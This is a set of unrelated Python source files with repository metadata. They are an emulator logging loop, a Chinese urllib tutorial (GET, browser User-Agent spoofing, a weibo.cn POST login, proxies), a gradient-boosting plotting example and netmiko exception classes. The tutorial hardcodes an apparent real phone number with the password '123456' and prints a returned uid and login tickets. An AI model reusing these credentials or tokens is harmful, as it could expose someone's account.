os.path.isfile(log_path+log_file_name): print "Log file {} already exist. Experiment cancelled.".format(log_file_name) else: log_file = open(log_path+log_file_name,"w") print log_file_name + datetime.now().strftime(' [%Y-%m-%d %H:%M:%S] ') + '00%' time.sleep(1) sys.stdout = log_file while emu.epoch is not None and emu.epoch<TOTAL_EPOCHS: # log time print "Epoch {},".format(emu.epoch), left = emu.te.head_datetime + emu.te.epoch*emu.te.time_step right = left + emu.te.time_step print "{} - {}".format(left.strftime("%Y-%m-%d %H:%M:%S"), right.strftime("%Y-%m-%d %H:%M:%S")) emu.step() print if emu.epoch%(0.1*TOTAL_EPOCHS)==0: sys.stdout = sys_stdout print log_file_name, print datetime.now().strftime('[%Y-%m-%d %H:%M:%S] ')+'{}0%'.format(10*emu.epoch/TOTAL_EPOCHS) time.sleep(1) sys.stdout = log_file sys.stdout = sys_stdout log_file.close() print log_file_name, print datetime.now().strftime('[%Y-%m-%d %H:%M:%S]'), print '{:.3f} sec,'.format(time.time()-t), print '{:.3f} min'.format((time.time()-t)/60)
8ff0c8e47e574a3a1e3a5c08bcb4cd992a48c23a
7fbf91c595f3adb67e29ab879a0b215581d260bf
/知识点/04-LiaoXueFeng-master/55-urllib.py
f613e42c3282f9ecbfdeb46685e8f672b48fb8c8
[]
no_license
Randyedu/python
69947b3836e62d0081d92591ae2acd9a54eadb9a
5f9e7bec295ae05eadde0f661e7039c2bd08f725
refs/heads/master
2021-04-26T22:20:22.555128
2018-03-02T07:01:27
2018-03-02T07:01:27
124,074,741
1
0
null
2018-03-06T12:23:42
2018-03-06T12:23:42
null
UTF-8
Python
false
false
4,701
py
''' urllib urllib提供了一系列用于操作URL的功能。 urllib提供的功能就是利用程序去执行各种HTTP请求。如果要模拟浏览器完成特定功能,需要把请求伪装成浏览器。伪装的方法是先监控浏览器发出的请求,再根据浏览器的请求头来伪装,User-Agent头就是用来标识浏览器的。 ''' ''' Get urllib的request模块可以非常方便地抓取URL内容,也就是发送一个GET请求到指定的页面,然后返回HTTP的响应: ''' ''' # 对网页进行抓取,并返回响应: from urllib import request url = 'https://api.douban.com/v2/book/2129650' with request.urlopen(url) as f: data = f.read() print('Status:', f.status,f.reason) for k,v in f.getheaders(): print('%s:%s' % (k,v)) print(data.decode('utf-8')) ''' print('----模拟浏览器发送GET请求----') ''' 如果我们要想模拟浏览器发送GET请求,就需要使用Request对象. 通过往Request对象添加HTTP头,我们就可以把请求伪装成浏览器。 例如,模拟iPhone 6去请求豆瓣首页: ''' from urllib import request ''' url = 'http://www.douban.com/' req = request.Request(url) req.add_header('User-Agent', 'Mozilla/6.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/8.0 Mobile/10A5376e Safari/8536.25') with request.urlopen(req) as f: print('status:',f.status,f.reason) for k,v in f.getheaders(): print('%s:%s' % (k,v)) print(f.read().decode('utf-8')) ''' print('----以POST发送一个请求----') ''' Post 如果要以POST发送一个请求,只需要把参数data以bytes形式传入。 ''' # 我们模拟一个微博登录,先读取登录的邮箱和口令,然后按照weibo.cn的登录页的格式以username=xxx&password=xxx的编码传入: from urllib import request,parse print('Login to weibo.cn...') email = '18767162147' passwd = '123456' login_data = parse.urlencode([ ('username',email), ('password',passwd), ('entry','mweibo'), ('client_id',''), ('savestate','1'), ('ec',''), ('pagerefer','https://passport.weibo.cn/signin/welcome?entry=mweibo&r=http%3A%2F%2Fm.weibo.cn%2F') ]) req = request.Request('https://passport.weibo.cn/sso/login') req.add_header('Origin', 'https://passport.weibo.cn') req.add_header('User-Agent', 'Mozilla/6.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/8.0 Mobile/10A5376e Safari/8536.25') req.add_header('Referer', 'https://passport.weibo.cn/signin/login?entry=mweibo&res=wel&wm=3349&r=http%3A%2F%2Fm.weibo.cn%2F') with request.urlopen(req, data=login_data.encode('utf-8')) as f: print('Status:',f.status,f.reason) for k,v in f.getheaders(): print('%s:%s' % (k,v)) print('Data:',f.read().decode('utf-8')) ''' Login to weibo.cn... Status: 200 OK Server:nginx/1.2.0 Date:Wed, 18 Nov 2015 01:17:48 GMT Content-Type:text/html Transfer-Encoding:chunked Connection:close Vary:Accept-Encoding Cache-Control:no-cache, must-revalidate Expires:Sat, 26 Jul 1997 05:00:00 GMT Pragma:no-cache Access-Control-Allow-Origin:https://passport.weibo.cn Access-Control-Allow-Credentials:true DPOOL_HEADER:dryad45 SINA-LB:aGEuOTAuZzEucXhnLmxiLnNpbmFub2RlLmNvbQ== SINA-TS:ZGNjYTk0Y2UgMCAwIDAgNCA0ODAK 登录成功: Data: {"retcode":20000000,"msg":"","data":{"loginresulturl":"https:\/\/passport.weibo.com\/sso\/crossdomain?entry=mweibo&action=login&proj=1&ticket=ST-MTk1NTAzMjcxNw%3D%3D-1447809422-gz-2C1D9275A244AFBEC6C3994B7615CBE0&display=0&cdurl=https%3A%2F%2Flogin.sina.com.cn%2Fsso%2Fcrossdomain%3Fentry%3Dmweibo%26action%3Dlogin%26proj%3D1%26ticket%3DST-MTk1NTAzMjcxNw%253D%253D-1447809422-gz-FE1989D8F7BC5227D9D27A1379670EF5%26display%3D0%26cdurl%3Dhttps%253A%252F%252Fpassport.sina.cn%252Fsso%252Fcrossdomain%253Fentry%253Dmweibo%2526action%253Dlogin%2526display%253D0%2526ticket%253DST-MTk1NTAzMjcxNw%25253D%25253D-1447809422-gz-057CDD10C8F2E7EB8E9797ADB86B4477","uid":"1955032717"}} 登录失败: Data: {"retcode":50011002,"msg":"\u7528\u6237\u540d\u6216\u5bc6\u7801\u9519\u8bef","data":{"im":1,"username":"18767162147","errline":604}} ''' ''' Handler 如果还需要更复杂的控制,比如通过一个Proxy(代理服务器)去访问网站,我们需要利用ProxyHandler来处理 ''' import urllib.request proxy_handler = urllib.request.ProxyHandler({'http':'http://www.example.com:3128/'}) proxy_auth_handler = urllib.request.ProxyBasicAuthHandler() proxy_auth_handler.add_password('realm','host','username','password') opener = urllib.request.build_opener(proxy_handler,proxy_auth_handler) with opener.open('http://www.example.com/login.html') as f: pass
09ea107626a3b50a80e9b2624651b464bff260df
162e0e4791188bd44f6ce5225ff3b1f0b1aa0b0d
/examples/ensemble/plot_gradient_boosting_regularization.py
30116b2be102df536f491dab433fc757a2c46506
[]
no_license
testsleeekGithub/trex
2af21fa95f9372f153dbe91941a93937480f4e2f
9d27a9b44d814ede3996a37365d63814214260ae
refs/heads/master
2020-08-01T11:47:43.926750
2019-11-06T06:47:19
2019-11-06T06:47:19
210,987,245
1
0
null
null
null
null
UTF-8
Python
false
false
2,842
py
""" ================================ Gradient Boosting regularization ================================ Illustration of the effect of different regularization strategies for Gradient Boosting. The example is taken from Hastie et al 2009 [1]_. The loss function used is binomial deviance. Regularization via shrinkage (``learning_rate < 1.0``) improves performance considerably. In combination with shrinkage, stochastic gradient boosting (``subsample < 1.0``) can produce more accurate models by reducing the variance via bagging. Subsampling without shrinkage usually does poorly. Another strategy to reduce the variance is by subsampling the features analogous to the random splits in Random Forests (via the ``max_features`` parameter). .. [1] T. Hastie, R. Tibshirani and J. Friedman, "Elements of Statistical Learning Ed. 2", Springer, 2009. """ print(__doc__) # Author: Peter Prettenhofer <[email protected]> # # License: BSD 3 clause import numpy as np import matplotlib.pyplot as plt from mrex import ensemble from mrex import datasets X, y = datasets.make_hastie_10_2(n_samples=12000, random_state=1) X = X.astype(np.float32) # map labels from {-1, 1} to {0, 1} labels, y = np.unique(y, return_inverse=True) X_train, X_test = X[:2000], X[2000:] y_train, y_test = y[:2000], y[2000:] original_params = {'n_estimators': 1000, 'max_leaf_nodes': 4, 'max_depth': None, 'random_state': 2, 'min_samples_split': 5} plt.figure() for label, color, setting in [('No shrinkage', 'orange', {'learning_rate': 1.0, 'subsample': 1.0}), ('learning_rate=0.1', 'turquoise', {'learning_rate': 0.1, 'subsample': 1.0}), ('subsample=0.5', 'blue', {'learning_rate': 1.0, 'subsample': 0.5}), ('learning_rate=0.1, subsample=0.5', 'gray', {'learning_rate': 0.1, 'subsample': 0.5}), ('learning_rate=0.1, max_features=2', 'magenta', {'learning_rate': 0.1, 'max_features': 2})]: params = dict(original_params) params.update(setting) clf = ensemble.GradientBoostingClassifier(**params) clf.fit(X_train, y_train) # compute test set deviance test_deviance = np.zeros((params['n_estimators'],), dtype=np.float64) for i, y_pred in enumerate(clf.staged_decision_function(X_test)): # clf.loss_ assumes that y_test[i] in {0, 1} test_deviance[i] = clf.loss_(y_test, y_pred) plt.plot((np.arange(test_deviance.shape[0]) + 1)[::5], test_deviance[::5], '-', color=color, label=label) plt.legend(loc='upper left') plt.xlabel('Boosting Iterations') plt.ylabel('Test Set Deviance') plt.show()
2c1206ff3140a312e6079a06ddf7380a15553501
009c1088e42cd50591946f736c30c0bad6db851b
/netmiko/ssh_exception.py
ad9e728ba282388faa4e5286d0a8f5df8748ee36
[ "MIT" ]
permissive
hellt/netmiko
812501b0651db920ac07e09132651eee7bdd4794
f7ff5e6278acaecff7583518cc97bd945fceddc3
refs/heads/master
2021-01-18T12:45:01.751466
2016-11-18T23:30:44
2016-11-18T23:30:44
38,681,423
2
0
null
2015-07-07T10:44:21
2015-07-07T10:44:20
Python
UTF-8
Python
false
false
380
py
from paramiko.ssh_exception import SSHException from paramiko.ssh_exception import AuthenticationException class NetMikoTimeoutException(SSHException): """SSH session timed trying to connect to the device.""" pass class NetMikoAuthenticationException(AuthenticationException): """SSH authentication exception based on Paramiko AuthenticationException.""" pass